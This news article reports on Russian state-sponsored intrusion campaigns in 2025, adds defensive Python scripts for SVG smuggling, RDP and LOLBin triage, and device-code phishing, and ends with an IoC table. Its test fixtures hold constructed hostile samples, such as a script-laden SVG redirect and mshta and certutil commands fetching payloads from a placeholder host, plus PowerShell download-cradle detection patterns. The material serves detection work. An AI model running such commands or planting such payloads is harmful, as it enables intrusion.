Russian state-sponsored threat groups significantly stepped up their cyber operations in 2025, using a range of methods to break into targeted systems.
From exploiting remote desktop tools and virtual private networks to manipulating trusted supply chains and deceiving employees through social engineering, these actors have built a dangerous and versatile toolkit for gaining initial access.
The attacks are not random. They are well-planned, persistent campaigns aimed at government bodies, defense organizations, energy infrastructure, and other critical sectors, particularly in Ukraine and across Europe.
Threat actors under designations such as UAC-0002 (Sandworm), UAC-0001 (APT28), UAC-0010 (Gamaredon), and UAC-0190 (Void Blizzard) have each played an active role throughout the year.
According to a report from Ukraine's National Security and Defense Council shared with Cyber Security News (CSN), the volume and complexity of these attacks grew considerably in 2025, with CERT-UA recording 5,927 cyber incidents, a 37.4% rise over 2024.
The report confirms that RDP exploitation, VPN vulnerabilities, and phishing through platforms like Signal, WhatsApp, and Telegram are among the most common methods used to gain a foothold inside targeted networks.
The consequences of these breaches extend beyond data theft. Several intrusions led to the deployment of destructive wiper malware, ransomware, and long-running espionage tools designed to silently collect and exfiltrate sensitive information.
The scale of this activity signals that these groups operate not just as cybercriminals but as instruments of a broader geopolitical strategy.
In at least one case, attackers used stolen credentials purchased from access brokers on darknet forums to move directly into targeted environments. This approach cuts the time between initial access and active exploitation, bypassing traditional phishing entirely.
RDP, VPN, and Supply Chain as Entry Points
Remote Desktop Protocol remains one of the most abused entry vectors in 2025. Groups including UAC-0238 exploited exposed RDP services to push ransomware variants such as X2anylock, Warlock, and LockBit 3.0 into compromised environments.
VPN appliances were targeted through vulnerabilities including CVE-2025-20333 and CVE-2025-20362, giving attackers a direct tunnel into internal networks.
Supply chain intrusions added another serious layer of risk. Actors targeted software update mechanisms, third-party tools, and IT service providers to plant backdoors where scrutiny is typically lower. Once inside, groups deployed malware families like Remcos RAT, DarkCrystal RAT, XWorm, and Lumma Stealer to maintain persistent access.
Vulnerabilities in widely used platforms were also exploited, including flaws in Roundcube (CVE-2024-42009, CVE-2025-49113), Fortinet appliances (CVE-2024-55591, CVE-2024-21762), and archiving tools like WinRAR and 7-Zip.
Older Microsoft Office flaws (CVE-2017-11882, CVE-2017-0199) that remain unpatched in many organizations were also leveraged, proving legacy vulnerabilities still carry very real consequences.
Payloads arrived through file types including SVG, PNG, LNK, JS, and HTA files, often hosted on legitimate services like Dropbox, Google Drive, and Cloudflare Tunnels to bypass network defenses.
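The SVG case is worth a concrete check, because an SVG is parsed as XML and can carry scripts and event handlers while still rendering as a picture. The following inspector is an added example, not code from the article or from CERT-UA: it walks an SVG's element tree, flags script-bearing elements and attributes, and decodes long base64 runs so that a smuggled HTML page or redirect URL becomes visible to an analyst. Both SVG documents are constructed samples; `example.invalid` is a placeholder hostname.

```python
"""Inspect SVG attachments for script smuggling before delivery.

Added example, not code from the article. Both SVG documents below are
constructed samples; the base64 payload is built at import time so the
sample stays readable.
"""
import base64
import re
import xml.etree.ElementTree as ET

SMUGGLED_HTML = b'<html><body><iframe src="https://example.invalid"></iframe></body></html>'

# An "image" that also carries an onload handler, an inline script with a
# base64 redirect target, and an HTML payload parked in a foreignObject attribute.
SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" onload="run()">
  <rect width="100" height="100" fill="#ccc"/>
  <script>function run(){ location.href = atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvbG9naW4="); }</script>
  <foreignObject width="1" height="1">
    <div xmlns="http://www.w3.org/1999/xhtml" data-payload="%s"></div>
  </foreignObject>
</svg>""" % base64.b64encode(SMUGGLED_HTML).decode()

BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>"""

B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}


def local_name(qname):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qname.rsplit("}", 1)[-1].lower()


def decoded_blobs(text):
    """Decode long base64 runs in text and return those that are printable ASCII."""
    out = []
    for m in B64_RUN.finditer(text or ""):
        blob = m.group(0)
        if len(blob) % 4:
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            out.append(raw.decode("ascii"))
    return out


def inspect_svg(data):
    """Return reasons to quarantine the SVG; an empty list means nothing was found."""
    findings = []
    for el in ET.fromstring(data).iter():
        name = local_name(el.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element present")
        for attr, value in el.attrib.items():
            a = local_name(attr)
            if a.startswith("on"):
                findings.append(f"event handler {a} on <{name}>")
            if a in ("href", "src") and value.strip().lower().startswith(("javascript:", "data:text/html")):
                findings.append(f"{a} on <{name}> points to {value[:40]}")
            for decoded in decoded_blobs(value):
                findings.append(f"base64 in {a} on <{name}> decodes to: {decoded[:60]}")
        for decoded in decoded_blobs(el.text):
            findings.append(f"base64 inside <{name}> decodes to: {decoded[:60]}")
    return findings


if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(label, inspect_svg(doc) or "clean")
```

Run against the constructed sample, the inspector reports the `onload` handler, the `<script>` and `<foreignObject>` elements, the decoded redirect target `https://example.invalid/login`, and the decoded HTML page hidden in the `data-payload` attribute; the benign circle produces no findings. One caveat for production use: `xml.etree` does not fetch external entities, but it is still exposed to entity-expansion attacks, so parse untrusted attachments with `defusedxml` instead.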
Living off the Land techniques using built-in tools such as PowerShell, certutil, mshta.exe, and rundll32 helped attackers blend into normal system activity and evade detection.
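Both the RDP abuse described earlier and the living-off-the-land execution described here leave traces in the Windows Security log, and the same triage script can surface both. The script below is an added example, not code from the article or from CERT-UA. It parses a constructed, simplified key=value export of Security events (adapt `parse_events` to your SIEM's schema), flags RDP (logon type 10) successes that follow a burst of failures or arrive from outside trusted address space, and flags 4688 process-creation events where mshta, certutil, rundll32 or PowerShell are launched with arguments typical of payload staging. The sample events, users and defanged URLs are constructed.

```python
"""Triage Windows Security events for RDP abuse and living-off-the-land execution.

Added example, not from the article. The input format is a constructed,
simplified key=value export of Security log fields.
"""
import ipaddress
import re
from collections import Counter

# Constructed sample: an RDP password-guessing burst that eventually succeeds,
# a normal internal RDP logon, and three process launches, two of them LOLBin abuse.
SAMPLE_EVENTS = r"""
EventID=4625 LogonType=10 TargetUser=admin IpAddress=203.0.113.5 Time=02:00:01
EventID=4625 LogonType=10 TargetUser=admin IpAddress=203.0.113.5 Time=02:00:02
EventID=4625 LogonType=10 TargetUser=admin IpAddress=203.0.113.5 Time=02:00:03
EventID=4625 LogonType=10 TargetUser=admin IpAddress=203.0.113.5 Time=02:00:04
EventID=4625 LogonType=10 TargetUser=admin IpAddress=203.0.113.5 Time=02:00:05
EventID=4624 LogonType=10 TargetUser=admin IpAddress=203.0.113.5 Time=02:00:09
EventID=4624 LogonType=10 TargetUser=jdoe IpAddress=10.0.0.7 Time=08:15:00
EventID=4688 NewProcessName=C:\Windows\System32\mshta.exe CommandLine="mshta.exe https://example[.]invalid/a.hta" SubjectUser=jdoe
EventID=4688 NewProcessName=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -split -f https://example[.]invalid/p.bin p.bin" SubjectUser=jdoe
EventID=4688 NewProcessName=C:\Windows\System32\notepad.exe CommandLine="notepad.exe report.txt" SubjectUser=jdoe
"""

# key=value pairs; a value may be double-quoted so that command lines keep their spaces
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_events(text):
    """Turn one event per line into a list of dicts (string values only)."""
    events = []
    for line in text.strip().splitlines():
        ev = {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
              for m in FIELD_RE.finditer(line)}
        events.append(ev)
    return events


def _trusted(src, nets):
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:          # "-" or empty source in some events
        return False
    return any(ip in n for n in nets)


def rdp_findings(events, trusted_networks, fail_threshold=5):
    """Flag RDP successes preceded by >= fail_threshold failures from the same
    source, and RDP successes from outside trusted_networks. Events are assumed
    to be in chronological order."""
    nets = [ipaddress.ip_network(n) for n in trusted_networks]
    failures = Counter()
    findings = []
    for ev in events:
        if ev.get("LogonType") != "10":
            continue
        src = ev.get("IpAddress", "")
        if ev.get("EventID") == "4625":
            failures[src] += 1
        elif ev.get("EventID") == "4624":
            user = ev.get("TargetUser", "?")
            if failures[src] >= fail_threshold:
                findings.append(f"RDP success for {user} from {src} after {failures[src]} failures")
            if not _trusted(src, nets):
                findings.append(f"RDP success for {user} from untrusted source {src}")
    return findings


# (image name pattern, command-line pattern, description); all matched case-insensitively
LOLBIN_RULES = [
    (r"mshta\.exe$", r"https?://|javascript:|vbscript:", "mshta launching remote or inline script"),
    (r"certutil\.exe$", r"-urlcache|-decode|-encode", "certutil used to download or decode a payload"),
    (r"rundll32\.exe$", r"javascript:|url\.dll,|\\\\", "rundll32 script execution or UNC-hosted DLL"),
    (r"(powershell|pwsh)\.exe$", r"-enc|-e\b|hidden|iex\b|downloadstring|frombase64string",
     "encoded, hidden or downloading PowerShell"),
]


def lolbin_findings(events):
    """Flag 4688 process creations matching a LOLBin rule."""
    findings = []
    for ev in events:
        if ev.get("EventID") != "4688":
            continue
        image, cmd = ev.get("NewProcessName", ""), ev.get("CommandLine", "")
        for image_re, cmd_re, why in LOLBIN_RULES:
            if re.search(image_re, image, re.I) and re.search(cmd_re, cmd, re.I):
                findings.append(f"{why}: {cmd} (user {ev.get('SubjectUser', '?')})")
    return findings


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for f in rdp_findings(evs, ["10.0.0.0/8"]) + lolbin_findings(evs):
        print(f)
```

On the sample, the admin logon from 203.0.113.5 is reported twice (it follows five failures and it comes from outside 10.0.0.0/8), the internal jdoe logon is silent, and the mshta and certutil launches are reported while notepad is not. The rules are deliberately narrow; the value is in tuning `fail_threshold`, the trusted ranges and the command-line patterns to your environment rather than in the list itself.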
Social Engineering and Phishing Campaigns
Social engineering remained one of the most reliable methods Russian threat groups used to break in during 2025.
Phishing lures were sent through email platforms including Microsoft 365, Roundcube, and Zimbra, as well as messaging apps like Signal, WhatsApp, and Telegram.
Techniques such as ClickFix, fake CAPTCHA prompts, and PowerShell-based execution tricks helped attackers deliver malware without triggering immediate alerts.
OAuth phishing, device code phishing targeting Microsoft Teams, and app-specific password phishing against Google accounts were observed against more than a thousand individuals.
QR-code session hijacking through a method called GhostPairing was also deployed, and fake Android APK files spread outside Google Play to infect devices with tools including CamelSpy.
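Device code phishing needs no malware and no stolen password: the victim is talked into entering an attacker-generated code at the legitimate Microsoft device-login page, and the attacker's client then receives the tokens. The one place it is reliably visible is the Entra ID sign-in log, where the flow is recorded with `authenticationProtocol` set to `deviceCode`. The hunt below is an added example, not code from the article or from CERT-UA; its field names follow the Microsoft Graph `signIn` resource, and the sign-in records, users and addresses are constructed. It flags successful device-code sign-ins by accounts that have no business using that flow, and adds a second reason when the same user signed in from a different country minutes earlier, which is what a redeemed phishing code looks like.

```python
"""Hunt for device-code phishing in Entra ID sign-in logs.

Added example, not from the article. Field names follow the Microsoft Graph
signIn resource (authenticationProtocol, ipAddress, location, status); the
records below are constructed, not real sign-ins.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_SIGNINS = [
    # normal interactive Teams sign-in from the user's usual location
    {"createdDateTime": "2025-04-02T08:01:00Z", "userPrincipalName": "o.koval@example.invalid",
     "appDisplayName": "Microsoft Teams", "authenticationProtocol": "oAuth2",
     "ipAddress": "198.51.100.10", "location": {"countryOrRegion": "UA"}, "status": {"errorCode": 0}},
    # minutes later the same account completes a device-code flow from another country:
    # the user typed the attacker's code into the device-login page, the attacker redeemed it
    {"createdDateTime": "2025-04-02T08:04:30Z", "userPrincipalName": "o.koval@example.invalid",
     "appDisplayName": "Microsoft Teams", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.77", "location": {"countryOrRegion": "NL"}, "status": {"errorCode": 0}},
    # a meeting-room device that legitimately uses the device code flow
    {"createdDateTime": "2025-04-02T09:00:00Z", "userPrincipalName": "room-kiosk@example.invalid",
     "appDisplayName": "Microsoft Teams", "authenticationProtocol": "deviceCode",
     "ipAddress": "198.51.100.20", "location": {"countryOrRegion": "UA"}, "status": {"errorCode": 0}},
    # a device-code attempt that never completed (non-zero errorCode; constructed value)
    {"createdDateTime": "2025-04-02T10:00:00Z", "userPrincipalName": "i.bondar@example.invalid",
     "appDisplayName": "Microsoft Teams", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.78", "location": {"countryOrRegion": "NL"}, "status": {"errorCode": 70016}},
]


def _t(iso):
    return datetime.fromisoformat(iso.replace("Z", "+00:00"))


def device_code_findings(signins, expected_users=(), window=timedelta(minutes=30)):
    """Return one finding per successful device-code sign-in by an account not in
    expected_users. Each finding lists why it stands out, including a location
    split against any other successful sign-in by the same user within `window`."""
    by_user = defaultdict(list)
    for s in sorted(signins, key=lambda s: s["createdDateTime"]):
        by_user[s["userPrincipalName"]].append(s)

    findings = []
    for user, events in by_user.items():
        if user in expected_users:
            continue
        for s in events:
            if s.get("authenticationProtocol") != "deviceCode" or s["status"]["errorCode"] != 0:
                continue
            reasons = ["device code flow is not expected for this account"]
            here, now = s["location"]["countryOrRegion"], _t(s["createdDateTime"])
            for other in events:
                if other is s or other["status"]["errorCode"] != 0:
                    continue
                gap = abs(now - _t(other["createdDateTime"]))
                if gap <= window and other["location"]["countryOrRegion"] != here:
                    reasons.append(
                        f"redeemed from {here} ({s['ipAddress']}) within "
                        f"{int(gap.total_seconds() // 60)} min of a "
                        f"{other['location']['countryOrRegion']} sign-in")
                    break
            findings.append({"user": user, "time": s["createdDateTime"],
                             "app": s["appDisplayName"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in device_code_findings(SAMPLE_SIGNINS, expected_users=("room-kiosk@example.invalid",)):
        print(f["user"], f["time"], f["app"])
        for r in f["reasons"]:
            print("  -", r)
```

On the sample, only o.koval's 08:04:30 sign-in is reported, with both reasons; the kiosk account is allowlisted and the failed attempt is ignored. Detection is the fallback: where the flow is not needed, Entra Conditional Access can block the device code flow outright through its authentication flows condition, which removes the phishing technique rather than just spotting it.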
To counter these threats, organizations are advised to enforce multi-factor authentication, adopt Zero Trust architecture, and use Protective DNS to block malicious domains.
Patch management across both new and legacy vulnerabilities is essential, and staff should receive regular training to spot social engineering attempts.
Security teams should restrict RDP access and monitor for unusual use of built-in system tools that attackers frequently repurpose.
Indicators of Compromise (IoCs):
| Type | Indicator | Description |
|---|---|---|
| CVE | CVE-2025-20333 | Cisco ASA/AnyConnect VPN vulnerability used for initial access |
| CVE | CVE-2025-20362 | Cisco ASA/AnyConnect VPN vulnerability used for initial access |
| CVE | CVE-2024-42009 | Roundcube webmail vulnerability exploited by Russian APT groups |
| CVE | CVE-2024-37383 | Roundcube webmail vulnerability exploited in campaigns |
| CVE | CVE-2025-49113 | Roundcube webmail vulnerability used in 2025 campaigns |
| CVE | CVE-2025-48700 | Roundcube webmail vulnerability exploited in 2025 |
| CVE | CVE-2024-55591 | Fortinet appliance vulnerability exploited for initial access |
| CVE | CVE-2024-21762 | Fortinet appliance vulnerability exploited for initial access |
| CVE | CVE-2025-24472 | Fortinet appliance vulnerability exploited for initial access |
| CVE | CVE-2017-11882 | Legacy Microsoft Office flaw still actively exploited |
| CVE | CVE-2017-0199 | Legacy Microsoft Office flaw still actively exploited |
| CVE | CVE-2025-6218 | WinRAR vulnerability used by Gamaredon/Sandworm/RomCom |
| CVE | CVE-2025-8088 | WinRAR vulnerability used by UAC-0180 (RomCom) |
| CVE | CVE-2025-0411 | 7-Zip vulnerability exploited by UAC-0006 |
| CVE | CVE-2024-38213 | Windows Mark-of-the-Web bypass exploited by Sandworm (UAC-0212) |
| CVE | CVE-2025-43300 | Apple iOS/macOS vulnerability |
| CVE | CVE-2025-49844 | Redis vulnerability (1010 instances targeted) |
| CVE | CVE-2025-49090 | Matrix platform vulnerability |
| CVE | CVE-2025-54315 | Matrix platform vulnerability |
| Malware | Remcos RAT | Remote access trojan used for persistent access |
| Malware | DarkCrystal RAT | Remote access trojan deployed post-compromise |
| Malware | XWorm | Malware used in multiple Russian-linked campaigns |
| Malware | Lumma Stealer | Credential and data stealer deployed by multiple groups |
| Malware | LameHug | Malware used by UAC-0001 (APT28) |
| Malware | HomeSteel | Data exfiltration tool targeting Ukrainian organizations |
| Malware | WreckSteel | Destructive/exfiltration malware in 2025 campaigns |
| Malware | FileMess | Malware used in Ukrainian-targeted campaigns |
| Malware | GiftedCrook | Stealer targeting VPN credentials and Telegram data |
| Malware | CamelSpy | Android spyware distributed via fake APKs |
| Malware | ZEROLOT | Wiper malware linked to Sandworm |
| Malware | PathWiper | Wiper malware targeting Ukrainian organizations |
| Malware | Sting | Malware deployed by Sandworm in 2025 |
| Malware | Snake Keylogger | Keylogger deployed in phishing-based campaigns |
| Malware | PicassoLoader | Loader used by UAC-0057 (Ghostwriter) |
| Malware | SmokeLoader | Loader malware used in multiple campaigns |
| Malware | NetSupport RAT | Legitimate RMM tool abused as malware |
| Malware | Pterodo | Backdoor associated with UAC-0010 (Gamaredon) |
| Malware | AgentTesla | Credential-stealing malware used in phishing campaigns |
| Malware | FormBook | Infostealer deployed via phishing |
| Malware | Rhadamanthys | Stealer malware distributed in 2025 campaigns |
| Malware | RedLine | Credential stealer observed in 2025 campaigns |
| Malware | LokiBot | Infostealer deployed via legacy Office exploit chains |
| Malware | X2anylock | Ransomware variant pushed via RDP exploitation |
| Malware | Warlock | Ransomware variant used by UAC-0238 |
| Technique | GhostPairing | QR-code based account hijacking technique |
| Technique | ClickFix | Social engineering trick used to execute malicious scripts |
| Technique | Device Code Phishing | OAuth/device code abuse targeting Microsoft 365 |
| Tool | Cloudflare Tunnels | Abused for C2 communication and payload hosting |
| Tool | Telegram | Used as C2 channel by UAC-0010 and others |
| Tool | Telegraph | Used by UAC-0010 as a dead-drop resolver to publish current C2 IP addresses |

